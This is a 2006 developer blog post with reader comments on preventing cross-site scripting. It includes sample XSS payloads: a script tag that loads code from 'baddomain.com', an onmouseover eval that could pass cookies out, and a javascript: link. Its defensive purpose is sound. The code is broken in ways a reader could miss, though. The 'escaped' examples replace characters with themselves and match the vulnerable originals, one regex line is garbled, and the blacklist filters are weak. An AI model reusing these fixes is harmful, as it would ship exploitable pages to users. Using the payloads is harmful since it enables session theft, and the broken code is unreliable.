Preventing Cross Site Scripting Attacks
Posted by gmurray71 on September 27, 2006 at 12:01 PM | Comments (9)
Preventing Cross Site Scripting Attacks
Cross site scripting (XSS) is basically using JavaScript to execute JavaScript from an unwanted domain in a page. Such scripts could expose any data in a page that is accessible by JavaScript including, cookies, form data, or content to a 3rd party. Here is how you can prevent your web pages from being exploited on both the client and the server. This is followed with tips on how to avoid vulnerable sites.
- Escape parameters and User Input - The safest step you can take is to escape all parameters to a page where the parameters are displayed in the content.The same applies for any user input that may be displayed or re-displayed in a web page rendered by a server. The downside is that your users can not provide markup.
- Remove
eval(), javascript, and script from User Provided Markup - If you allow users to provide markup in any part of your application that is displayed in a page make sure to remove eval() and javascript: calls from element attributes including styles as they can be used to execute JavaScript. Also remove script blocks.
- Filter User Input on the Server - You should always filter user input that is stored or processed on a server because URLs and GET/POST requests can be created manually.
- Use Caution with Dynamic Script Injection - Be careful when dynamically injecting external scripts to retrieve JSON based data as you are potentially exposing everything accessible by JavaScript.
- Avoid XSS Phishing Attacks - Be aware of sites that contain vulnerabilities and phishing style attacks containing external script references.
Escape Parameters and User Input
This is the classic XSS attack that can open your service or web application up to hackers. By design the site displays a user's id that is passed in as a URL parameter. The following script will take the id and display a welcome message.
<script type="text/javascript">
var start = window.location.href.indexOf("id");
var stop = window.location.href.length;
var id = "guest";
if (start < stop) {
id = decodeURIComponent(window.location.href.substring(start,stop));
}
document.write("Hi " + id);
</script>
A request to the URL index.html?id=greg (assuming the page containing the script is index.html) will result in:
Hi greg
What would happen if instead of "greg" I used the following URL:
index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E
Notice the URL above contains a link to script http://baddomain.com/badscript.js which contains malicious code from a different domain. This script will be evaluated when the page is loaded putting the page and all the data in it at risk.
To prevent from these types of attacks your client code should always escape "<" and ">" parameters that are displayed or evaluated by JavaScript code.
You can do this with a simple line of code as can be seen in the next example.
<script type="text/javascript">
var start = window.location.href.indexOf("id");
var stop = window.location.href.length;
var id = "guest";
if (start < stop) {
id = decodeURIComponent(window.location.href.substring(start,stop));
}
document.write("hi " + id);
</script>
Consider the following containing a form where a user enters a description that will be visible to other users.
<html>
<head>
<script type="text/javascript">
function displayName() {
var description = document.getElementById("description").value;
var display = document.getElementById("display");
display.innerHTML = description;
}
</script>
</head>
<body>
<form onsubmit="displayName();return false;">
<textarea id="description" type="text" cols="55" rows="5"></textarea>
<input type="submit" value="Show Description">
</form>
<div id="display"></div>
</body>
</html>
Seems innocent enough right? Try including the following content in the text area.
<a onmouseover="eval('s=document.createElement(\'script\'); document.body.appendChild(s); s.src=\'badscript.js\'')">Mouse Over Me</a>
A mouseover of the link will cause a script in a badscript.js to be loaded. This script could also pass along cookies or any other information it wanted to as parameters of the "s.src" URL. Unlike the first example where the user would need to click on a bad link this type of attack requires a simple mouseover to load the badscript.js.
So the question now comes to mind: 'How do you protect your web page from being being exploited?'
Along with the parameters you should escape form input. If you plan to allow users to provide their own markup consider the next solution titled Remove eval(), javascript, and script from User Provided Markup.
The following code shows how to escape markup on the client.
<html>
<head>
<script type="text/javascript">
function displayName() {
var description = document.getElementById("description").value;
var display = document.getElementById("display");
description = description .replace(/</g, "<").replace(/>/g, ">");
display.innerHTML = description;
}
</script>
</head>
<body>
<form onsubmit="displayName();return false;">
<textarea id="description" type="text" cols="55" rows="5"></textarea>
<input type="submit" value="Show Description">
</form>
<div id="display"></div>
</body>
</html>
The code description = description.replace(//g, ">"); filters the user input and prevents unwanted scripts from being executed.
Now that we have looked at how to prevent most attacks the next section focuses on cases where you want to allow users to provide markup that does not contain malicious code.
Remove eval(), javascript:, and script from User Provided Markup
There may be cases where you want to allow a user to add markup such as links or HTML content that is displayed for other users to see. Consider a blog that allows for HTML markup, user provided URLs, HTML comments, or any other markup. The solution would be to filter all markup before it is displayed in a page or before it is sent to a server or service. The following example shows how to allow for some HTML markup while preventing malicious code.
<html>
<head>
<script type="text/javascript">
function displayName() {
var description = document.getElementById("description").value;
var display = document.getElementById("display");
description.replace(/[\"\'][\s]*javascript:(.*)[\"\']/g, "\"\"");
description = description.replace(/script(.*)/g, "");
description = description.replace(/eval\((.*)\)/g, "");
display.innerHTML = description;
}
</script>
</head>
<body>
<form onsubmit="displayName();return false;">
<textarea id="description" type="text" cols="55" rows="5"></textarea>
<input type="submit" value="Show Description">
</form>
<div id="display"></div>
</body>
</html>
The example above removes all eval(), javascript and script references that may be entered in the description field. The replacement here is not a perfect as it may replace legitimate uses of the words javascript and script in the body of a document. You may consider refining the regular expressions to only look in tag attributes for example and to remove full scripts. There are other considerations you should keep in mind when filtering client code such as line breaks, charsets, case sensitivity which are commonly exploited in attacks. As some browsers will allow you to specify JavaScript calls from CSS styles you should also consider searching user provided CSS styles as well.
Filter User Input on the Server
Most of the problems related to cross site scripting are because of poorly designed clients. Servers can also unwillingly become participants in cross domain scripting attacks if they redisplay unfiltered user input. Consider the following example where a hacker manually makes a HTTP POST request to set the homepage URL with the following.
<a href="javascipt:eval('alert(\'bad\')');">Click Me</a>
The URL would end up being stored as is on the server as is and expose any user that clicks on the URL to the JavaScript. The example above seems innocent enough but consider what would happen if in place of an alert('bad') the "javascript" contained malicious code. To prevent such attacks you should filter user input on the server. The following Java example shows how to use regular expression replacement to filter user input.
String description = request.getParameter("description");
description = description.replaceAll("<", "<").replaceAll(">", ">");
description = description.replaceAll("eval\\((.*)\\)", "");
description = description.replaceAll("[\\\"\\\'][\\s]*javascript:(.*)[\\\"\\\']", "\"\"");
description = description.replaceAll("script", "");
The code above removes eval() calls, javascript: calls, and script references the replacement here is not a perfect as it may replace legitimate uses of the words javascript and script in the body of a document. The code above may be applied using a servlet, servlet filter, or JSF component on all input parameters or on a per parameter basis depending on what how much markup you would like to allow users to provide. You may want refine the regular expressions that filter the content to handle more or consider a Java library built that specializes in removing malicious code.
Use Caution with Dynamic Script Injection
Dynamic script injection to retrieve JSON data (also known as JSONP) can be powerful and useful as it decouples your client from the server of origin. There is still a bit of debate over using JSONP as some consider it as a hack or security hole in JavaScript because when you dynamically include a reference to a 3rd party script you are giving that script full access to everything in your page. That script could go on to inject other scripts or do pretty much whatever it wanted.
If you choose to use JSONP make sure you trust the site for which you are interacting with. There is nothing stopping a JSONP provider from including unwanted script with JSONP data. One alternative would be to provide a proxy service which you can control the output, restrict access to, and can cache as needed.
Avoid XSS Phishing Attacks
This next recommendation focuses on protecting yourself as a user from a site that is vulnerable to cross site scripting attacks.
Phishing attacks, or attacks where what appears to be a valid URL links to a fraudulent web page who's purpose is to collect a users data, are nothing new to the web world. A related attack involves cross site scripting attacks where a URL to a legitimate site that has a cross site scripting vulnerability contains a script reference. Such a link may appear in an email message, blog posting/comment, or other user generated content that contains a URL. Clicking a link to a site containing a cross site scripting vulnerability would cause a 3rd party script to be included along with your request and could expose your password, user id, or any other data. Consider the following example:
<a href="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E">See foobar</a>
A quick look at the URL shows it references the site http://foobar.com/index.html. An unsuspecting user may not see the script included as a parameter later in the URL.
It is also wise to always look at carefully at URLs and the URL parameters that are provided with them. URLs will always appear in the status bar of your browser as and you should always look for external script reference. Another solution would be to manually type in links into the URL bar of your browser if a link is suspect.
Be aware of sites known to have vulnerabilities and be very careful with any personal data you provide those sites.
While JavaScript based interfaces can be very flexible you need to be very careful with all user provided input whether it be as parameters or form data. Always make sure to escape or filter input on the both the client and server. As a user you should be cautious not to become a victim of a vulnerable site. It's better to be safe than in the news!
What other things do you do to prevent XSS attacks?
Bookmark blog post: del.icio.us Digg DZone Furl Reddit
Comments
Comments are listed in date ascending order (oldest first) | Post Comment
-
It’s not enough to just remove javascript:; the MySpace worm had a newline between java and script: and IE still accepted it.
Don’t underestimate the creativity of people trying to get around regular-expression based input filtering. In my opinion, the only way to actually be safe is if you're accepting more than plain text is to parse all the HTML and CSS yourself, accepting only a small, valid subset of values, and recreate the output from the parsed objects. This also lets you use something like TagSoup to convert random user-entered HTML to valid XHTML.
Make sure you get the encoding right, too. If the browser thinks the page looks like Shift-JIS instead of ISO-8859-1 (for example), it might interpret safe code incorrectly. Always set the charset to UTF-8 in the <%@page contentType=...%>, and use a character encoding filter to set it in the request.
Posted by: nzcarey on September 27, 2006 at 03:54 PM
-
Content type and new line hacks are something I did not deep dive into too much here. I totally agree here with nzcarey that you should also keep these things in mind. The safest choice would be to allow no user generated markup of course. Thank you nzcarey for hte comments!
Posted by: gmurray71 on September 27, 2006 at 04:03 PM
-
Very informative. Thanks.
Posted by: johanley on September 28, 2006 at 08:28 AM
-
consider a Java library built that specializes in removing malicious code
Do you know of any such libraries?
Posted by: dnewfield on January 04, 2007 at 10:45 PM
-
There is some information on the Open Web Application Security Project with some source code examples but nothing all inclusive yet.
Posted by: gmurray71 on January 05, 2007 at 12:28 AM
-
Good information. I'd argue, however, that input should not be modified AT time of input, but that it should be preserved and later modified to escape ONLY for the purpose they are about to be used. Thus it really should not be "user input", but rather ANY input into an operation should be considered for escaping. If user input is taken and used for SQL and then later taken to be used for HTML, it should be escaped for the appropriate operation AT THAT TIME. I find people escape once for one purpose, and then forget that the input may not have been escaped for another (SQL vs HTML output vs. ???). Understand your trust boundaries. :)
Posted by: asleeis on January 12, 2007 at 03:16 PM
-
I agree, all input should be validated. This would include any requests to services as well.
Preserving things as is could have it's benefits so long as everyone working with the data from that data-base is aware of the escaping. If you had other developers in your organization using that data you could get bitten.
Posted by: gmurray71 on January 12, 2007 at 03:23 PM
-
OK, so now I've done built pretty much exactly what you've described: Tagsoup parse into XHTML in order to filter and allow through only "safe" content.
But it's still not clear how to do that.
I've effectively built an (incomplete) table of allowed tags and allowed attributes, and I currently walk the dom trimming any that are not explicitly allowed.
Doing that "correctly" means ensuring that my whitelists are accurate and safe. For example, it seems nice to allow style attributes, but is that safe? In order to allow css, maybe class attributes, but is id necessary? Don't I then have to worry about using any of those "ajax without javascript" .js libraries? Because of those are there specific class attribute values I should disallow?
It is clear that this filter is insufficient. For example, I want to allow links, so href must be allowed in <a/> tags, but clearly I don't want to allow that to be used as a way to trigger javascript so I must explicitly check the content of this attribute. That brings us right back to an ad-hoc collection of unescapeHtml/indexOf searches (for script, eval, etc.). This seems sloppy and unless carefully maintained likely to lead to XSS vulnerabilities for my users...
Is there an obvious next step that I'm missing? Does anyone have available a table of "safe" table/attribute combinations? This seems like someplace where I'd rather trust someone with more knowledge/experience than myself. Have only black-hats focused on this problem? Seems ripe for a good open-source tool...
Posted by: dnewfield on January 20, 2007 at 07:04 PM
-
Sorry for the re-post, but the first one was quite hard to read. Here it is again with a bit more formatting (and clarified phrases).
OK, so now I've done built pretty much exactly what you've described: Tagsoup parse into XHTML in order to filter and allow through only "safe" content.
But it's still not clear how to do that.
I've effectively built an (incomplete) table of allowed tags and allowed attributes, and I currently walk the DOM trimming any that are not explicitly allowed.
Doing that "correctly" means ensuring that my whitelists are accurate and safe. For example, it seems nice to allow style attributes, but is that safe? In order to allow css, maybe class attributes should be allowed, but are id attributes necessary? Don't I then have to worry about using any of those "ajax without javascript" .js libraries? Because of those are there specific class attribute values I should disallow?
It is clear that this filter is insufficient. For example, I want to allow links, so href must be allowed in <a/> tags, but clearly I don't want to allow that to be used as a way to trigger javascript so I must explicitly check the content of this attribute. That brings us right back to an ad-hoc collection of unescapeHtml/indexOf searches (for script, eval, etc.). This seems sloppy and unless carefully maintained likely to lead to XSS vulnerabilities for my users...
Is there an obvious next step that I'm missing? Does anyone have available a table of "safe" tag/attribute combinations? This seems like someplace where I'd rather trust someone with more knowledge/experience than myself. Have only black-hats focused on this problem? Seems ripe ground for a good open-source (white-hat) tool...
Posted by: dnewfield on January 23, 2007 at 09:25 AM
|